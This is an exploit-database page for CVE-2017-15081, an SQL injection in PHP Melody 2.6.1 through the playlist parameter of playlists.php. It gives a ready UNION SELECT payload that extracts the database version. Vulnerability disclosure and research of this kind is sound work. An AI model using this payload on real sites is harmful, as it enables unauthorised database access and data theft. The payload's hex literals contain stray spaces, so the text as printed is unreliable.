[] NeoSense
E X P L O I T S
title author type platform port cve id

PHP Melody 2.6.1 - SQL Injection

Author: Venkat Rajgor
type: webapps
platform: php
port: 
date_added: 2017-10-30 
date_updated: 2017-10-30 
verified: 0 
codes: CVE-2017-15081 
tags: 
aliases:  
screenshot_url:  
application_url: 
###################################################
[+] Author : Venkat Rajgor
[+] Email : Venki9990@gmail.com
[+] Vulnerability : SQL injection
###################################################
E-mail ID : support@phpsugar.com
Download : http://www.phpsugar.com
Web : http://www.phpsugar.com
Price : $39 USD
###################################################
Vulnerable parameter: http://x.x.x.x/playlists.php?playlist=
Application : PHPSUGAR PHP Melody version 2.6.1
Vulnerability : PHPSUGAR PHP Melody 2.6.1 SQL Injection
###################################################

Description : In PHPSUGAR PHP Melody CMS 2.6.1, SQL Injection exists via the playlist parameter to playlists.php.

Payload Used : ' UNION SELECT null,concat(0x223c2f613e3c2f64 69763e3c2f6469763e,version(),0 x3c212d2d),null,null,null,null ,null,null,null,null,null-- -
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.